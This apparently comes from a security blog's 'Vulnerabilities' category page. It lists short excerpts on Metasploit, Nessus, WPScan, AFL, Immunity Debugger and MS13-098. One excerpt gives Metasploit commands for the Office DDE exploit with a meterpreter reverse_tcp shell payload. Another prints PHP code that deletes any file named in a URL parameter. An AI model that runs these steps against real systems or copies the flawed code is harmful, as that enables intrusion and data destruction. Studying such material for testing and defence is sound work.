Category: Vulnerabilities

All about Vulnerabilities!

Exploits, Office

Exploit Microsoft Office DDE Command Execution Vulnerability

Download module wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb Move module into framework mv dde_delivery.rb /usr/share/metasploit-framework/modules/exploits/windows/ Open Metasploit and load exploit msfconsole reload_all use exploit/windows/dde_delivery Set the server host set SRVHOST 192.168.1.10 Choose payload and run it set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.1.10 set LPORT 443 exploit …

Metasploit

Setup Metasploit Database

Try reconfiguring Metasploit dpkg-reconfigure metasploit-framework Start postgresql systemctl start postgresql.service Initialize database msfdb init Run metasploit msfconsole Connect to database db_connect -y /usr/share/metasploit-framework/config/database.yml Rebuild cache db_rebuild_cache Run postgresql at startup systemctl enable postgresql.service

Nessus

Nessus _qdb_open: invalid table of contents

1. You start Nessus and you get an error while connecting to https://127.0.0.1:8834. 2. You run nessuscli and you get an error indicating: blah blah _qdb_open: invalid table of contents Stop Nessus service service nessusd stop Repair Nessus /opt/nessus/sbin/nessusd -R Start Nessus service service nessusd start

Vulnerabilities

Black box WordPress vulnerability scanner

WPScan is a black box WordPress vulnerability scanner. WPSCAN ARGUMENTS --update Update the database to the latest version. --url | -u The WordPress URL/domain to scan. --force | -f Forces WPScan to not check if the remote site is running WordPress. --enumerate | -e [option(s)] Enumeration. option : u usernames from id 1 to 10 …

Nessus, NMAP

Import Nmap results into Nessus

Download the Nmap XML Import plugin from http://tenablesecurity.com/documentation/nmapxml.nasl Copy the nmapxml.nasl file into the Nessus plugins directory C:\ProgramData\Tenable\Nessus\nessus\plugins Run a command prompt as Administrator net stop "Tenable Nessus" Load Nessus new plugins cd C:\Program Files\Tenable\Nessus nessusd.exe -y Start the Nessus service net start "Tenable Nessus" Under …

Exploits, Fuzzing

Security oriented open source fuzzer

American fuzzy lop is a security-oriented fuzzer that employs a novel type of compile-time instrumentation and genetic algorithms to automatically discover clean, interesting test cases that trigger new internal states in the targeted binary. This substantially improves the functional coverage for the fuzzed code. The compact synthesized corpora produced by the tool are also useful …

Exploits, Malware Analysis, Reverse Engineering

Write exploits, analyze malware, and reverse engineer binary files

Immunity Debugger is a powerful new way to write exploits, analyze malware, and reverse engineer binary files. It builds on a solid user interface with function graphing, the industry’s first heap analysis tool built specifically for heap creation, and a large and well supported Python API for easy extensibility. Overview A debugger with functionality designed …

News, Security, Vulnerabilities

Enable Windows Authenticode signature verification

Microsoft Security Bulletin MS13-098 This security update resolves a privately reported vulnerability in Microsoft Windows. The vulnerability could allow remote code execution if a user or application runs or installs a specially crafted, signed portable executable (PE) file on an affected system. This security update is rated Critical for all supported releases of Windows. The …

Injection, PHP, Vulnerabilities

PHP Command Injection Vulnerability in Web applications

Create a new PHP file, name it test_command_injection.php, and save it inside Apache’s htdocs directory: <?php if(isset($_GET['filename'])) { $filename = $_GET['filename']; if(file_exists($filename)) { unlink($filename); } } Open your favorite browser and open url: http://localhost/test_command_injection.php?filename=path_to_file_4_deletion As you can see you could delete any file in the …